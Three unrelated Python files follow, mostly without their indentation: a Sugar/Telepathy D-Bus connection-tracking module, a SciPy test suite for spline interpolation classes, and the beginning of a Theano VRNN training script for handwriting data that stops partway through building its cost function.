# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place - Suite 330,
# Boston, MA 02111-1307, USA.
"""
UNSTABLE. It should really be internal to the sugar.presence package.
"""
from functools import partial
import dbus
from dbus import PROPERTIES_IFACE
from telepathy.interfaces import ACCOUNT, \
ACCOUNT_MANAGER
from telepathy.constants import CONNECTION_STATUS_CONNECTED
ACCOUNT_MANAGER_SERVICE = 'org.freedesktop.Telepathy.AccountManager'
ACCOUNT_MANAGER_PATH = '/org/freedesktop/Telepathy/AccountManager'
class Connection(object):
def __init__(self, account_path, connection):
self.account_path = account_path
self.connection = connection
self.connected = False
class ConnectionManager(object):
"""Track available telepathy connections"""
def __init__(self):
self._connections_per_account = {}
bus = dbus.SessionBus()
obj = bus.get_object(ACCOUNT_MANAGER_SERVICE, ACCOUNT_MANAGER_PATH)
account_manager = dbus.Interface(obj, ACCOUNT_MANAGER)
account_paths = account_manager.Get(ACCOUNT_MANAGER, 'ValidAccounts',
dbus_interface=PROPERTIES_IFACE)
for account_path in account_paths:
obj = bus.get_object(ACCOUNT_MANAGER_SERVICE, account_path)
obj.connect_to_signal('AccountPropertyChanged',
partial(self.__account_property_changed_cb, account_path))
connection_path = obj.Get(ACCOUNT, 'Connection')
if connection_path != '/':
self._track_connection(account_path, connection_path)
def __account_property_changed_cb(self, account_path, properties):
if 'Connection' not in properties:
return
if properties['Connection'] == '/':
if account_path in self._connections_per_account:
del self._connections_per_account[account_path]
else:
self._track_connection(account_path, properties['Connection'])
def _track_connection(self, account_path, connection_path):
connection_name = connection_path.replace('/', '.')[1:]
bus = dbus.SessionBus()
connection = bus.get_object(connection_name, connection_path)
connection.connect_to_signal('StatusChanged',
partial(self.__status_changed_cb, account_path))
self._connections_per_account[account_path] = \
Connection(account_path, connection)
account = bus.get_object(ACCOUNT_MANAGER_SERVICE, account_path)
status = account.Get(ACCOUNT, 'ConnectionStatus')
if status == CONNECTION_STATUS_CONNECTED:
self._connections_per_account[account_path].connected = True
else:
self._connections_per_account[account_path].connected = False
def __status_changed_cb(self, account_path, status, reason):
if status == CONNECTION_STATUS_CONNECTED:
self._connections_per_account[account_path].connected = True
else:
self._connections_per_account[account_path].connected = False
def get_preferred_connection(self):
best_connection = None, None
for account_path, connection in self._connections_per_account.items():
if 'salut' in account_path and connection.connected:
best_connection = account_path, connection.connection
elif 'gabble' in account_path and connection.connected:
best_connection = account_path, connection.connection
break
return best_connection
def get_connection(self, account_path):
return self._connections_per_account[account_path].connection
def get_connections_per_account(self):
return self._connections_per_account
def get_account_for_connection(self, connection_path):
for account_path, connection in self._connections_per_account.items():
if connection.connection.object_path == connection_path:
return account_path
return None
_connection_manager = None
def get_connection_manager():
global _connection_manager
if not _connection_manager:
_connection_manager = ConnectionManager()
return _connection_manager
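# Minimal usage sketch (assumes a Telepathy AccountManager is available on the
# session bus; the printed strings are illustrative only):
#   manager = get_connection_manager()
#   account_path, connection = manager.get_preferred_connection()
#   if connection is None:
#       print 'no connected Salut or Gabble account'
#   else:
#       print 'using the connection of account', account_path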
|
#!/usr/bin/env python
# Created by Pearu Peterson, June 2003
from __future__ import division, print_function, absolute_import
import warnings
import numpy as np
from numpy.testing import (assert_equal, assert_almost_equal, assert_array_equal,
assert_array_almost_equal, assert_allclose, assert_raises, TestCase,
run_module_suite)
from numpy import array, diff, linspace, meshgrid, ones, pi, shape
from scipy.interpolate.fitpack import bisplrep, bisplev
from scipy.interpolate.fitpack2 import (UnivariateSpline,
LSQUnivariateSpline, InterpolatedUnivariateSpline,
LSQBivariateSpline, SmoothBivariateSpline, RectBivariateSpline,
LSQSphereBivariateSpline, SmoothSphereBivariateSpline,
RectSphereBivariateSpline)
class TestUnivariateSpline(TestCase):
def test_linear_constant(self):
x = [1,2,3]
y = [3,3,3]
lut = UnivariateSpline(x,y,k=1)
assert_array_almost_equal(lut.get_knots(),[1,3])
assert_array_almost_equal(lut.get_coeffs(),[3,3])
assert_almost_equal(lut.get_residual(),0.0)
assert_array_almost_equal(lut([1,1.5,2]),[3,3,3])
def test_preserve_shape(self):
x = [1, 2, 3]
y = [0, 2, 4]
lut = UnivariateSpline(x, y, k=1)
arg = 2
assert_equal(shape(arg), shape(lut(arg)))
assert_equal(shape(arg), shape(lut(arg, nu=1)))
arg = [1.5, 2, 2.5]
assert_equal(shape(arg), shape(lut(arg)))
assert_equal(shape(arg), shape(lut(arg, nu=1)))
def test_linear_1d(self):
x = [1,2,3]
y = [0,2,4]
lut = UnivariateSpline(x,y,k=1)
assert_array_almost_equal(lut.get_knots(),[1,3])
assert_array_almost_equal(lut.get_coeffs(),[0,4])
assert_almost_equal(lut.get_residual(),0.0)
assert_array_almost_equal(lut([1,1.5,2]),[0,1,2])
def test_subclassing(self):
# See #731
class ZeroSpline(UnivariateSpline):
def __call__(self, x):
return 0*array(x)
sp = ZeroSpline([1,2,3,4,5], [3,2,3,2,3], k=2)
assert_array_equal(sp([1.5, 2.5]), [0., 0.])
def test_empty_input(self):
# Test whether empty input returns an empty output. Ticket 1014
x = [1,3,5,7,9]
y = [0,4,9,12,21]
spl = UnivariateSpline(x, y, k=3)
assert_array_equal(spl([]), array([]))
def test_resize_regression(self):
"""Regression test for #1375."""
x = [-1., -0.65016502, -0.58856235, -0.26903553, -0.17370892,
-0.10011001, 0., 0.10011001, 0.17370892, 0.26903553, 0.58856235,
0.65016502, 1.]
y = [1.,0.62928599, 0.5797223, 0.39965815, 0.36322694, 0.3508061,
0.35214793, 0.3508061, 0.36322694, 0.39965815, 0.5797223,
0.62928599, 1.]
w = [1.00000000e+12, 6.88875973e+02, 4.89314737e+02, 4.26864807e+02,
6.07746770e+02, 4.51341444e+02, 3.17480210e+02, 4.51341444e+02,
6.07746770e+02, 4.26864807e+02, 4.89314737e+02, 6.88875973e+02,
1.00000000e+12]
spl = UnivariateSpline(x=x, y=y, w=w, s=None)
desired = array([0.35100374, 0.51715855, 0.87789547, 0.98719344])
assert_allclose(spl([0.1, 0.5, 0.9, 0.99]), desired, atol=5e-4)
def test_out_of_range_regression(self):
# Test different extrapolation modes. See ticket 3557
x = np.arange(5, dtype=np.float)
y = x**3
xp = linspace(-8, 13, 100)
xp_zeros = xp.copy()
xp_zeros[np.logical_or(xp_zeros < 0., xp_zeros > 4.)] = 0
xp_clip = xp.copy()
xp_clip[xp_clip < x[0]] = x[0]
xp_clip[xp_clip > x[-1]] = x[-1]
for cls in [UnivariateSpline, InterpolatedUnivariateSpline]:
spl = cls(x=x, y=y)
for ext in [0, 'extrapolate']:
assert_allclose(spl(xp, ext=ext), xp**3, atol=1e-16)
assert_allclose(cls(x, y, ext=ext)(xp), xp**3, atol=1e-16)
for ext in [1, 'zeros']:
assert_allclose(spl(xp, ext=ext), xp_zeros**3, atol=1e-16)
assert_allclose(cls(x, y, ext=ext)(xp), xp_zeros**3, atol=1e-16)
for ext in [2, 'raise']:
assert_raises(ValueError, spl, xp, **dict(ext=ext))
for ext in [3, 'const']:
assert_allclose(spl(xp, ext=ext), xp_clip**3, atol=1e-16)
assert_allclose(cls(x, y, ext=ext)(xp), xp_clip**3, atol=1e-16)
# also test LSQUnivariateSpline [which needs explicit knots]
t = spl.get_knots()[3:4] # interior knots w/ default k=3
spl = LSQUnivariateSpline(x, y, t)
assert_allclose(spl(xp, ext=0), xp**3, atol=1e-16)
assert_allclose(spl(xp, ext=1), xp_zeros**3, atol=1e-16)
assert_raises(ValueError, spl, xp, **dict(ext=2))
assert_allclose(spl(xp, ext=3), xp_clip**3, atol=1e-16)
# also make sure that unknown values for `ext` are caught early
for ext in [-1, 'unknown']:
spl = UnivariateSpline(x, y)
assert_raises(ValueError, spl, xp, **dict(ext=ext))
assert_raises(ValueError, UnivariateSpline,
**dict(x=x, y=y, ext=ext))
def test_lsq_fpchec(self):
xs = np.arange(100) * 1.
ys = np.arange(100) * 1.
knots = np.linspace(0, 99, 10)
bbox = (-1, 101)
assert_raises(ValueError, LSQUnivariateSpline, xs, ys, knots,
bbox=bbox)
def test_derivative_and_antiderivative(self):
# Thin wrappers to splder/splantider, so light smoke test only.
x = np.linspace(0, 1, 70)**3
y = np.cos(x)
spl = UnivariateSpline(x, y, s=0)
spl2 = spl.antiderivative(2).derivative(2)
assert_allclose(spl(0.3), spl2(0.3))
spl2 = spl.antiderivative(1)
assert_allclose(spl2(0.6) - spl2(0.2),
spl.integral(0.2, 0.6))
def test_nan(self):
# bail out early if the input data contains nans
x = np.arange(10, dtype=float)
y = x**3
for z in [np.nan, np.inf, -np.inf]:
y[-1] = z
assert_raises(ValueError, UnivariateSpline,
**dict(x=x, y=y, check_finite=True))
class TestLSQBivariateSpline(TestCase):
# NOTE: The systems in this test class are rank-deficient
def test_linear_constant(self):
x = [1,1,1,2,2,2,3,3,3]
y = [1,2,3,1,2,3,1,2,3]
z = [3,3,3,3,3,3,3,3,3]
s = 0.1
tx = [1+s,3-s]
ty = [1+s,3-s]
lut = LSQBivariateSpline(x,y,z,tx,ty,kx=1,ky=1)
assert_almost_equal(lut(2,2), 3.)
def test_bilinearity(self):
x = [1,1,1,2,2,2,3,3,3]
y = [1,2,3,1,2,3,1,2,3]
z = [0,7,8,3,4,7,1,3,4]
s = 0.1
tx = [1+s,3-s]
ty = [1+s,3-s]
with warnings.catch_warnings():
# This seems to fail (ier=1, see ticket 1642).
warnings.simplefilter('ignore', UserWarning)
lut = LSQBivariateSpline(x,y,z,tx,ty,kx=1,ky=1)
tx, ty = lut.get_knots()
for xa, xb in zip(tx[:-1], tx[1:]):
for ya, yb in zip(ty[:-1], ty[1:]):
for t in [0.1, 0.5, 0.9]:
for s in [0.3, 0.4, 0.7]:
xp = xa*(1-t) + xb*t
yp = ya*(1-s) + yb*s
zp = (+ lut(xa, ya)*(1-t)*(1-s)
+ lut(xb, ya)*t*(1-s)
+ lut(xa, yb)*(1-t)*s
+ lut(xb, yb)*t*s)
assert_almost_equal(lut(xp,yp), zp)
def test_integral(self):
x = [1,1,1,2,2,2,8,8,8]
y = [1,2,3,1,2,3,1,2,3]
z = array([0,7,8,3,4,7,1,3,4])
s = 0.1
tx = [1+s,3-s]
ty = [1+s,3-s]
lut = LSQBivariateSpline(x,y,z,tx,ty,kx=1,ky=1)
tx, ty = lut.get_knots()
tz = lut(tx, ty)
trpz = .25*(diff(tx)[:,None]*diff(ty)[None,:]
* (tz[:-1,:-1]+tz[1:,:-1]+tz[:-1,1:]+tz[1:,1:])).sum()
assert_almost_equal(lut.integral(tx[0], tx[-1], ty[0], ty[-1]), trpz)
def test_empty_input(self):
        # Test whether empty input returns an empty output. Ticket 1014
x = [1,1,1,2,2,2,3,3,3]
y = [1,2,3,1,2,3,1,2,3]
z = [3,3,3,3,3,3,3,3,3]
s = 0.1
tx = [1+s,3-s]
ty = [1+s,3-s]
lut = LSQBivariateSpline(x,y,z,tx,ty,kx=1,ky=1)
assert_array_equal(lut([], []), np.zeros((0,0)))
assert_array_equal(lut([], [], grid=False), np.zeros((0,)))
class TestSmoothBivariateSpline(TestCase):
def test_linear_constant(self):
x = [1,1,1,2,2,2,3,3,3]
y = [1,2,3,1,2,3,1,2,3]
z = [3,3,3,3,3,3,3,3,3]
lut = SmoothBivariateSpline(x,y,z,kx=1,ky=1)
assert_array_almost_equal(lut.get_knots(),([1,1,3,3],[1,1,3,3]))
assert_array_almost_equal(lut.get_coeffs(),[3,3,3,3])
assert_almost_equal(lut.get_residual(),0.0)
assert_array_almost_equal(lut([1,1.5,2],[1,1.5]),[[3,3],[3,3],[3,3]])
def test_linear_1d(self):
x = [1,1,1,2,2,2,3,3,3]
y = [1,2,3,1,2,3,1,2,3]
z = [0,0,0,2,2,2,4,4,4]
lut = SmoothBivariateSpline(x,y,z,kx=1,ky=1)
assert_array_almost_equal(lut.get_knots(),([1,1,3,3],[1,1,3,3]))
assert_array_almost_equal(lut.get_coeffs(),[0,0,4,4])
assert_almost_equal(lut.get_residual(),0.0)
assert_array_almost_equal(lut([1,1.5,2],[1,1.5]),[[0,0],[1,1],[2,2]])
def test_integral(self):
x = [1,1,1,2,2,2,4,4,4]
y = [1,2,3,1,2,3,1,2,3]
z = array([0,7,8,3,4,7,1,3,4])
with warnings.catch_warnings():
# This seems to fail (ier=1, see ticket 1642).
warnings.simplefilter('ignore', UserWarning)
lut = SmoothBivariateSpline(x, y, z, kx=1, ky=1, s=0)
tx = [1,2,4]
ty = [1,2,3]
tz = lut(tx, ty)
trpz = .25*(diff(tx)[:,None]*diff(ty)[None,:]
* (tz[:-1,:-1]+tz[1:,:-1]+tz[:-1,1:]+tz[1:,1:])).sum()
assert_almost_equal(lut.integral(tx[0], tx[-1], ty[0], ty[-1]), trpz)
lut2 = SmoothBivariateSpline(x, y, z, kx=2, ky=2, s=0)
assert_almost_equal(lut2.integral(tx[0], tx[-1], ty[0], ty[-1]), trpz,
decimal=0) # the quadratures give 23.75 and 23.85
tz = lut(tx[:-1], ty[:-1])
trpz = .25*(diff(tx[:-1])[:,None]*diff(ty[:-1])[None,:]
* (tz[:-1,:-1]+tz[1:,:-1]+tz[:-1,1:]+tz[1:,1:])).sum()
assert_almost_equal(lut.integral(tx[0], tx[-2], ty[0], ty[-2]), trpz)
def test_rerun_lwrk2_too_small(self):
# in this setting, lwrk2 is too small in the default run. Here we
# check for equality with the bisplrep/bisplev output because there,
# an automatic re-run of the spline representation is done if ier>10.
x = np.linspace(-2, 2, 80)
y = np.linspace(-2, 2, 80)
z = x + y
xi = np.linspace(-1, 1, 100)
yi = np.linspace(-2, 2, 100)
tck = bisplrep(x, y, z)
res1 = bisplev(xi, yi, tck)
interp_ = SmoothBivariateSpline(x, y, z)
res2 = interp_(xi, yi)
assert_almost_equal(res1, res2)
class TestLSQSphereBivariateSpline(TestCase):
def setUp(self):
# define the input data and coordinates
ntheta, nphi = 70, 90
theta = linspace(0.5/(ntheta - 1), 1 - 0.5/(ntheta - 1), ntheta) * pi
phi = linspace(0.5/(nphi - 1), 1 - 0.5/(nphi - 1), nphi) * 2. * pi
data = ones((theta.shape[0], phi.shape[0]))
# define knots and extract data values at the knots
knotst = theta[::5]
knotsp = phi[::5]
knotdata = data[::5, ::5]
# calculate spline coefficients
lats, lons = meshgrid(theta, phi)
lut_lsq = LSQSphereBivariateSpline(lats.ravel(), lons.ravel(),
data.T.ravel(), knotst, knotsp)
self.lut_lsq = lut_lsq
self.data = knotdata
self.new_lons, self.new_lats = knotsp, knotst
def test_linear_constant(self):
assert_almost_equal(self.lut_lsq.get_residual(), 0.0)
assert_array_almost_equal(self.lut_lsq(self.new_lats, self.new_lons),
self.data)
def test_empty_input(self):
assert_array_almost_equal(self.lut_lsq([], []), np.zeros((0,0)))
assert_array_almost_equal(self.lut_lsq([], [], grid=False), np.zeros((0,)))
class TestSmoothSphereBivariateSpline(TestCase):
def setUp(self):
theta = array([.25*pi, .25*pi, .25*pi, .5*pi, .5*pi, .5*pi, .75*pi,
.75*pi, .75*pi])
phi = array([.5 * pi, pi, 1.5 * pi, .5 * pi, pi, 1.5 * pi, .5 * pi, pi,
1.5 * pi])
r = array([3, 3, 3, 3, 3, 3, 3, 3, 3])
self.lut = SmoothSphereBivariateSpline(theta, phi, r, s=1E10)
def test_linear_constant(self):
assert_almost_equal(self.lut.get_residual(), 0.)
assert_array_almost_equal(self.lut([1, 1.5, 2],[1, 1.5]),
[[3, 3], [3, 3], [3, 3]])
def test_empty_input(self):
assert_array_almost_equal(self.lut([], []), np.zeros((0,0)))
assert_array_almost_equal(self.lut([], [], grid=False), np.zeros((0,)))
class TestRectBivariateSpline(TestCase):
def test_defaults(self):
x = array([1,2,3,4,5])
y = array([1,2,3,4,5])
z = array([[1,2,1,2,1],[1,2,1,2,1],[1,2,3,2,1],[1,2,2,2,1],[1,2,1,2,1]])
lut = RectBivariateSpline(x,y,z)
assert_array_almost_equal(lut(x,y),z)
def test_evaluate(self):
x = array([1,2,3,4,5])
y = array([1,2,3,4,5])
z = array([[1,2,1,2,1],[1,2,1,2,1],[1,2,3,2,1],[1,2,2,2,1],[1,2,1,2,1]])
lut = RectBivariateSpline(x,y,z)
xi = [1, 2.3, 5.3, 0.5, 3.3, 1.2, 3]
yi = [1, 3.3, 1.2, 4.0, 5.0, 1.0, 3]
zi = lut.ev(xi, yi)
zi2 = array([lut(xp, yp)[0,0] for xp, yp in zip(xi, yi)])
assert_almost_equal(zi, zi2)
def test_derivatives_grid(self):
x = array([1,2,3,4,5])
y = array([1,2,3,4,5])
z = array([[1,2,1,2,1],[1,2,1,2,1],[1,2,3,2,1],[1,2,2,2,1],[1,2,1,2,1]])
dx = array([[0,0,-20,0,0],[0,0,13,0,0],[0,0,4,0,0],
[0,0,-11,0,0],[0,0,4,0,0]])/6.
dy = array([[4,-1,0,1,-4],[4,-1,0,1,-4],[0,1.5,0,-1.5,0],
[2,.25,0,-.25,-2],[4,-1,0,1,-4]])
dxdy = array([[40,-25,0,25,-40],[-26,16.25,0,-16.25,26],
[-8,5,0,-5,8],[22,-13.75,0,13.75,-22],[-8,5,0,-5,8]])/6.
lut = RectBivariateSpline(x,y,z)
assert_array_almost_equal(lut(x,y,dx=1),dx)
assert_array_almost_equal(lut(x,y,dy=1),dy)
assert_array_almost_equal(lut(x,y,dx=1,dy=1),dxdy)
def test_derivatives(self):
x = array([1,2,3,4,5])
y = array([1,2,3,4,5])
z = array([[1,2,1,2,1],[1,2,1,2,1],[1,2,3,2,1],[1,2,2,2,1],[1,2,1,2,1]])
dx = array([0,0,2./3,0,0])
dy = array([4,-1,0,-.25,-4])
dxdy = array([160,65,0,55,32])/24.
lut = RectBivariateSpline(x,y,z)
assert_array_almost_equal(lut(x,y,dx=1,grid=False),dx)
assert_array_almost_equal(lut(x,y,dy=1,grid=False),dy)
assert_array_almost_equal(lut(x,y,dx=1,dy=1,grid=False),dxdy)
def test_broadcast(self):
x = array([1,2,3,4,5])
y = array([1,2,3,4,5])
z = array([[1,2,1,2,1],[1,2,1,2,1],[1,2,3,2,1],[1,2,2,2,1],[1,2,1,2,1]])
lut = RectBivariateSpline(x,y,z)
assert_allclose(lut(x, y), lut(x[:,None], y[None,:], grid=False))
class TestRectSphereBivariateSpline(TestCase):
def test_defaults(self):
y = linspace(0.01, 2*pi-0.01, 7)
x = linspace(0.01, pi-0.01, 7)
z = array([[1,2,1,2,1,2,1],[1,2,1,2,1,2,1],[1,2,3,2,1,2,1],
[1,2,2,2,1,2,1],[1,2,1,2,1,2,1],[1,2,2,2,1,2,1],
[1,2,1,2,1,2,1]])
lut = RectSphereBivariateSpline(x,y,z)
assert_array_almost_equal(lut(x,y),z)
def test_evaluate(self):
y = linspace(0.01, 2*pi-0.01, 7)
x = linspace(0.01, pi-0.01, 7)
z = array([[1,2,1,2,1,2,1],[1,2,1,2,1,2,1],[1,2,3,2,1,2,1],
[1,2,2,2,1,2,1],[1,2,1,2,1,2,1],[1,2,2,2,1,2,1],
[1,2,1,2,1,2,1]])
lut = RectSphereBivariateSpline(x,y,z)
yi = [0.2, 1, 2.3, 2.35, 3.0, 3.99, 5.25]
xi = [1.5, 0.4, 1.1, 0.45, 0.2345, 1., 0.0001]
zi = lut.ev(xi, yi)
zi2 = array([lut(xp, yp)[0,0] for xp, yp in zip(xi, yi)])
assert_almost_equal(zi, zi2)
def test_derivatives_grid(self):
y = linspace(0.01, 2*pi-0.01, 7)
x = linspace(0.01, pi-0.01, 7)
z = array([[1,2,1,2,1,2,1],[1,2,1,2,1,2,1],[1,2,3,2,1,2,1],
[1,2,2,2,1,2,1],[1,2,1,2,1,2,1],[1,2,2,2,1,2,1],
[1,2,1,2,1,2,1]])
lut = RectSphereBivariateSpline(x,y,z)
y = linspace(0.02, 2*pi-0.02, 7)
x = linspace(0.02, pi-0.02, 7)
assert_allclose(lut(x, y, dtheta=1), _numdiff_2d(lut, x, y, dx=1),
rtol=1e-4, atol=1e-4)
assert_allclose(lut(x, y, dphi=1), _numdiff_2d(lut, x, y, dy=1),
rtol=1e-4, atol=1e-4)
assert_allclose(lut(x, y, dtheta=1, dphi=1), _numdiff_2d(lut, x, y, dx=1, dy=1, eps=1e-6),
rtol=1e-3, atol=1e-3)
def test_derivatives(self):
y = linspace(0.01, 2*pi-0.01, 7)
x = linspace(0.01, pi-0.01, 7)
z = array([[1,2,1,2,1,2,1],[1,2,1,2,1,2,1],[1,2,3,2,1,2,1],
[1,2,2,2,1,2,1],[1,2,1,2,1,2,1],[1,2,2,2,1,2,1],
[1,2,1,2,1,2,1]])
lut = RectSphereBivariateSpline(x,y,z)
y = linspace(0.02, 2*pi-0.02, 7)
x = linspace(0.02, pi-0.02, 7)
assert_equal(lut(x, y, dtheta=1, grid=False).shape, x.shape)
assert_allclose(lut(x, y, dtheta=1, grid=False),
_numdiff_2d(lambda x,y: lut(x,y,grid=False), x, y, dx=1),
rtol=1e-4, atol=1e-4)
assert_allclose(lut(x, y, dphi=1, grid=False),
_numdiff_2d(lambda x,y: lut(x,y,grid=False), x, y, dy=1),
rtol=1e-4, atol=1e-4)
assert_allclose(lut(x, y, dtheta=1, dphi=1, grid=False),
_numdiff_2d(lambda x,y: lut(x,y,grid=False), x, y, dx=1, dy=1, eps=1e-6),
rtol=1e-3, atol=1e-3)
def _numdiff_2d(func, x, y, dx=0, dy=0, eps=1e-8):
if dx == 0 and dy == 0:
return func(x, y)
elif dx == 1 and dy == 0:
return (func(x + eps, y) - func(x - eps, y)) / (2*eps)
elif dx == 0 and dy == 1:
return (func(x, y + eps) - func(x, y - eps)) / (2*eps)
elif dx == 1 and dy == 1:
return (func(x + eps, y + eps) - func(x - eps, y + eps)
- func(x + eps, y - eps) + func(x - eps, y - eps)) / (2*eps)**2
else:
raise ValueError("invalid derivative order")
if __name__ == "__main__":
run_module_suite()
|
import ipdb
import numpy as np
import theano
import theano.tensor as T
from os import sys, path
sys.path.append("/Users/iorife/github/Investigaciones/nnet/VRNN_nips2015")
sys.path.append("/Users/iorife/github/Investigaciones/")
from nnet.VRNN_nips2015.cle.cle.cost import BiGauss, KLGaussianGaussian
from nnet.VRNN_nips2015.cle.cle.data import Iterator
from nnet.VRNN_nips2015.cle.cle.models import Model
from nnet.VRNN_nips2015.cle.cle.layers import InitCell
from nnet.VRNN_nips2015.cle.cle.layers.feedforward import FullyConnectedLayer
from nnet.VRNN_nips2015.cle.cle.layers.recurrent import LSTM
from nnet.VRNN_nips2015.cle.cle.train import Training
from nnet.VRNN_nips2015.cle.cle.train.ext import (
EpochCount,
GradientClipping,
Monitoring,
Picklize,
EarlyStopping,
WeightNorm
)
from nnet.VRNN_nips2015.cle.cle.train.opt import Adam
from nnet.VRNN_nips2015.cle.cle.utils import init_tparams, sharedX
from nnet.VRNN_nips2015.cle.cle.utils.compat import OrderedDict
from nnet.VRNN_nips2015.cle.cle.utils.op import Gaussian_sample
from nnet.VRNN_nips2015.cle.cle.utils.gpu_op import concatenate
from nnet.VRNN_nips2015.datasets.iamondb import IAMOnDB
def main(args):
trial = int(args['trial'])
pkl_name = 'vrnn_gauss_%d' % trial
channel_name = 'valid_nll_upper_bound'
data_path = args['data_path']
save_path = args['save_path']
monitoring_freq = int(args['monitoring_freq'])
epoch = int(args['epoch'])
batch_size = int(args['batch_size'])
x_dim = int(args['x_dim'])
z_dim = int(args['z_dim'])
rnn_dim = int(args['rnn_dim'])
lr = float(args['lr'])
debug = int(args['debug'])
print("trial no. %d" % trial)
print("batch size %d" % batch_size)
print("learning rate %f" % lr)
print("saving pkl file '%s'" % pkl_name)
print("to the save path '%s'" % save_path)
q_z_dim = 150
p_z_dim = 150
p_x_dim = 250
x2s_dim = 250
z2s_dim = 150
target_dim = (x_dim-1)
model = Model()
train_data = IAMOnDB(name='train',
prep='normalize',
cond=False,
path=data_path)
X_mean = train_data.X_mean
X_std = train_data.X_std
valid_data = IAMOnDB(name='valid',
prep='normalize',
cond=False,
path=data_path,
X_mean=X_mean,
X_std=X_std)
init_W = InitCell('rand')
init_U = InitCell('ortho')
init_b = InitCell('zeros')
init_b_sig = InitCell('const', mean=0.6)
x, mask = train_data.theano_vars()
if debug:
x.tag.test_value = np.zeros((15, batch_size, x_dim), dtype=np.float32)
temp = np.ones((15, batch_size), dtype=np.float32)
temp[:, -2:] = 0.
mask.tag.test_value = temp
x_1 = FullyConnectedLayer(name='x_1',
parent=['x_t'],
parent_dim=[x_dim],
nout=x2s_dim,
unit='relu',
init_W=init_W,
init_b=init_b)
z_1 = FullyConnectedLayer(name='z_1',
parent=['z_t'],
parent_dim=[z_dim],
nout=z2s_dim,
unit='relu',
init_W=init_W,
init_b=init_b)
rnn = LSTM(name='rnn',
parent=['x_1', 'z_1'],
parent_dim=[x2s_dim, z2s_dim],
nout=rnn_dim,
unit='tanh',
init_W=init_W,
init_U=init_U,
init_b=init_b)
phi_1 = FullyConnectedLayer(name='phi_1',
parent=['x_1', 's_tm1'],
parent_dim=[x2s_dim, rnn_dim],
nout=q_z_dim,
unit='relu',
init_W=init_W,
init_b=init_b)
phi_mu = FullyConnectedLayer(name='phi_mu',
parent=['phi_1'],
parent_dim=[q_z_dim],
nout=z_dim,
unit='linear',
init_W=init_W,
init_b=init_b)
phi_sig = FullyConnectedLayer(name='phi_sig',
parent=['phi_1'],
parent_dim=[q_z_dim],
nout=z_dim,
unit='softplus',
cons=1e-4,
init_W=init_W,
init_b=init_b_sig)
prior_1 = FullyConnectedLayer(name='prior_1',
parent=['s_tm1'],
parent_dim=[rnn_dim],
nout=p_z_dim,
unit='relu',
init_W=init_W,
init_b=init_b)
prior_mu = FullyConnectedLayer(name='prior_mu',
parent=['prior_1'],
parent_dim=[p_z_dim],
nout=z_dim,
unit='linear',
init_W=init_W,
init_b=init_b)
prior_sig = FullyConnectedLayer(name='prior_sig',
parent=['prior_1'],
parent_dim=[p_z_dim],
nout=z_dim,
unit='softplus',
cons=1e-4,
init_W=init_W,
init_b=init_b_sig)
theta_1 = FullyConnectedLayer(name='theta_1',
parent=['z_1', 's_tm1'],
parent_dim=[z2s_dim, rnn_dim],
nout=p_x_dim,
unit='relu',
init_W=init_W,
init_b=init_b)
theta_mu = FullyConnectedLayer(name='theta_mu',
parent=['theta_1'],
parent_dim=[p_x_dim],
nout=target_dim,
unit='linear',
init_W=init_W,
init_b=init_b)
theta_sig = FullyConnectedLayer(name='theta_sig',
parent=['theta_1'],
parent_dim=[p_x_dim],
nout=target_dim,
unit='softplus',
cons=1e-4,
init_W=init_W,
init_b=init_b_sig)
corr = FullyConnectedLayer(name='corr',
parent=['theta_1'],
parent_dim=[p_x_dim],
nout=1,
unit='tanh',
init_W=init_W,
init_b=init_b)
binary = FullyConnectedLayer(name='binary',
parent=['theta_1'],
parent_dim=[p_x_dim],
nout=1,
unit='sigmoid',
init_W=init_W,
init_b=init_b)
nodes = [rnn,
x_1, z_1,
phi_1, phi_mu, phi_sig,
prior_1, prior_mu, prior_sig,
theta_1, theta_mu, theta_sig, corr, binary]
params = OrderedDict()
for node in nodes:
if node.initialize() is not None:
params.update(node.initialize())
params = init_tparams(params)
s_0 = rnn.get_init_state(batch_size)
x_1_temp = x_1.fprop([x], params)
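    # One VRNN step, as implemented by inner_fn below: the approximate posterior
    # q(z_t | x_t, s_{t-1}) (phi_mu/phi_sig) and the prior p(z_t | s_{t-1})
    # (prior_mu/prior_sig) are both computed, z_t is sampled from the posterior,
    # and the LSTM state is advanced from the embeddings of x_t and z_t.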
def inner_fn(x_t, s_tm1):
phi_1_t = phi_1.fprop([x_t, s_tm1], params)
phi_mu_t = phi_mu.fprop([phi_1_t], params)
phi_sig_t = phi_sig.fprop([phi_1_t], params)
prior_1_t = prior_1.fprop([s_tm1], params)
prior_mu_t = prior_mu.fprop([prior_1_t], params)
prior_sig_t = prior_sig.fprop([prior_1_t], params)
z_t = Gaussian_sample(phi_mu_t, phi_sig_t)
z_1_t = z_1.fprop([z_t], params)
s_t = rnn.fprop([[x_t, z_1_t], [s_tm1]], params)
return s_t, phi_mu_t, phi_sig_t, prior_mu_t, prior_sig_t, z_1_t
((s_temp, phi_mu_temp, phi_sig_temp, prior_mu_temp, prior_sig_temp, z_1_temp), updates) =\
theano.scan(fn=inner_fn,
sequences=[x_1_temp],
outputs_info=[s_0, None, None, None, None, None])
for k, v in updates.iteritems():
k.default_update = v
s_temp = concatenate([s_0[None, :, :], s_temp[:-1]], axis=0)
theta_1_temp = theta_1.fprop([z_1_temp, s_temp], params)
theta_mu_temp = theta_mu.fprop([theta_1_temp], params)
theta_sig_temp = theta_sig.fprop([theta_1_temp], params)
corr_temp = corr.fprop([theta_1_temp], params)
binary_temp = binary.fprop([theta_1_temp], params)
kl_temp = KLGaussianGaussian(phi_mu_temp, phi_sig_temp, prior_mu_temp, prior_sig_temp)
x_shape = x.shape
x_in = x.reshape((x_shape[0]*x_shape[1], -1))
theta_mu_in = theta_mu_temp.reshape((x_shape[0]*x_shape[1], -1))
theta_sig_in = theta_sig_temp.reshape((x_shape[0]*x_shape[1], -1))
corr_in = corr_temp.reshape((x_shape[0]*x_shape[1], -1))
binary_in = binary_temp.reshape((x_shape[0]*x_shape[1], -1))
recon = BiGauss(x_in, theta_mu_in, theta_sig_in, corr_in, binary_in)
recon = recon.reshape((x_shape[0], x_shape[1]))
recon = recon * mask
recon_term = recon.sum(axis=0).mean()
recon_term.name = 'recon_term'
kl_temp = kl_temp * mask
